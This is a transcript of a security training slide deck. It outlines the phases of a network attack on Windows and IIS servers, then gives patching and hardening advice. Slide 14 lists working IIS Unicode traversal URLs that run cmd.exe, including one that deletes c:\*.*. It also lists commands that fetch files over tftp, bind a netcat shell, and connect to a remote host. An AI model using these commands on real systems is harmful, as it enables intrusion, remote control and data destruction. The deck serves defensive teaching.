expose the vulnerability paul hogan ward solutions
TRANSCRIPT
![Page 1: Expose the Vulnerability Paul Hogan Ward Solutions](https://reader035.vdocument.in/reader035/viewer/2022062511/551b0eac5503465e7d8b5f29/html5/thumbnails/1.jpg)
Expose the Vulnerability
Paul Hogan
Ward Solutions
![Page 2: Expose the Vulnerability Paul Hogan Ward Solutions](https://reader035.vdocument.in/reader035/viewer/2022062511/551b0eac5503465e7d8b5f29/html5/thumbnails/2.jpg)
Session Prerequisites
Hands-on experience with Windows 2000 or Windows Server 2003
Working knowledge of networking, including basics of security
Basic knowledge of network security-assessment strategies
Level 300
![Page 3: Expose the Vulnerability Paul Hogan Ward Solutions](https://reader035.vdocument.in/reader035/viewer/2022062511/551b0eac5503465e7d8b5f29/html5/thumbnails/3.jpg)
Anatomy of a Hack
Information Gathering / Profiling
nslookup, whois
Probe / Enumerating
Superscan, nmap, nessus, nikto, banner grabbing, OS fingerprinting
Attack
Unicode directory traversal
Advancement
Entrenchment
Infiltration/Extraction
![Page 4: Expose the Vulnerability Paul Hogan Ward Solutions](https://reader035.vdocument.in/reader035/viewer/2022062511/551b0eac5503465e7d8b5f29/html5/thumbnails/4.jpg)
nslookup
![Page 5: Expose the Vulnerability Paul Hogan Ward Solutions](https://reader035.vdocument.in/reader035/viewer/2022062511/551b0eac5503465e7d8b5f29/html5/thumbnails/5.jpg)
RIPE Whois
![Page 6: Expose the Vulnerability Paul Hogan Ward Solutions](https://reader035.vdocument.in/reader035/viewer/2022062511/551b0eac5503465e7d8b5f29/html5/thumbnails/6.jpg)
superscan
![Page 7: Expose the Vulnerability Paul Hogan Ward Solutions](https://reader035.vdocument.in/reader035/viewer/2022062511/551b0eac5503465e7d8b5f29/html5/thumbnails/7.jpg)
Simple Command Line Utilities
net view \\172.16.10.5
net use \\172.16.10.5
net use \\172.16.10.5 "" /u:"" red button vulnerability
net view \\172.16.10.5
nbtstat -A 172.16.10.5
nbtscan -r 172.16.10.0/24
net use \\172.16.10.5 "" /u:guest
![Page 8: Expose the Vulnerability Paul Hogan Ward Solutions](https://reader035.vdocument.in/reader035/viewer/2022062511/551b0eac5503465e7d8b5f29/html5/thumbnails/8.jpg)
nmap nessus
![Page 9: Expose the Vulnerability Paul Hogan Ward Solutions](https://reader035.vdocument.in/reader035/viewer/2022062511/551b0eac5503465e7d8b5f29/html5/thumbnails/9.jpg)
nikto
![Page 10: Expose the Vulnerability Paul Hogan Ward Solutions](https://reader035.vdocument.in/reader035/viewer/2022062511/551b0eac5503465e7d8b5f29/html5/thumbnails/10.jpg)
Overview
Name: Microsoft IIS 4.0/5.0 Extended Unicode Directory Traversal Vulnerability. (BugTraq ID 1806)
Operating System: Windows NT 4.0 (+ IIS 4.0) and Windows 2000 (+ IIS 5.0).
Brief Description: A particular type of malformed URL could be used to access files and directories beyond the web folders. This would potentially enable a malicious user to gain privileges commensurate with those of a locally logged-on users. Gaining these permissions would enable the malicious user to add, change or delete data, run code already on the server, or upload new code to the server and run it.
![Page 11: Expose the Vulnerability Paul Hogan Ward Solutions](https://reader035.vdocument.in/reader035/viewer/2022062511/551b0eac5503465e7d8b5f29/html5/thumbnails/11.jpg)
![Page 12: Expose the Vulnerability Paul Hogan Ward Solutions](https://reader035.vdocument.in/reader035/viewer/2022062511/551b0eac5503465e7d8b5f29/html5/thumbnails/12.jpg)
Impacts
If the E-business web server was compromised, the backend database sever is under threat too. Trust relationship. Same passwords. Database connection pools. Use web server and database server as a relay to connect the outside machine with the internal machines. Then firewall is circumvented……
If the compromised web server is a site for software distribution, add Trojans or Zombie codes to the downloadable software, then you can control all the machines which download software from that website…..
![Page 13: Expose the Vulnerability Paul Hogan Ward Solutions](https://reader035.vdocument.in/reader035/viewer/2022062511/551b0eac5503465e7d8b5f29/html5/thumbnails/13.jpg)
Solutions
Install patches as soon as possible
Patch Management: SMS/SUS/MBSA
Disable NetBIOS over TCP/IP.
Be sure that the IUSR_machinename account does not have write access to any files on the server.
![Page 14: Expose the Vulnerability Paul Hogan Ward Solutions](https://reader035.vdocument.in/reader035/viewer/2022062511/551b0eac5503465e7d8b5f29/html5/thumbnails/14.jpg)
Unicode Directory Traversal Attack
http://172.16.10.5/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\+/s
http://172.16.10.5/scripts/..%c0%af../winnt/system32/cmd.exe?/c+del+c:\*.*
perl -x unicodexecute.pl 172.16.10.5:80 dir
perl -x unicodexecute.pl 172.16.10.5:80 tftp -i 172.10.10.21 GET *.*
perl -x unicodexecute.pl 172.16.10.5:80 nc -L –p555 -d -e cmd.exe
c:\nc 192.168.1.2 443
![Page 15: Expose the Vulnerability Paul Hogan Ward Solutions](https://reader035.vdocument.in/reader035/viewer/2022062511/551b0eac5503465e7d8b5f29/html5/thumbnails/15.jpg)
How To Get Your Network Hacked In 10 Easy Steps
1. Don’t patch anything2. Run unhardened applications3. Logon everywhere as a domain admin4. Open lots of holes in the firewall5. Allow unrestricted internal traffic6. Allow all outbound traffic7. Don’t harden servers8. Use lame passwords9. Use high-level service accounts, in multiple places10. Assume everything is OK
![Page 16: Expose the Vulnerability Paul Hogan Ward Solutions](https://reader035.vdocument.in/reader035/viewer/2022062511/551b0eac5503465e7d8b5f29/html5/thumbnails/16.jpg)
The moral
Initial entry is everything
Most networks are designed like egg shells
Hard and crunchy on the outside
Soft and chewy on the inside
Once an attacker is inside the network you can…
Update resume
Hope he does a good job running it
Drain the network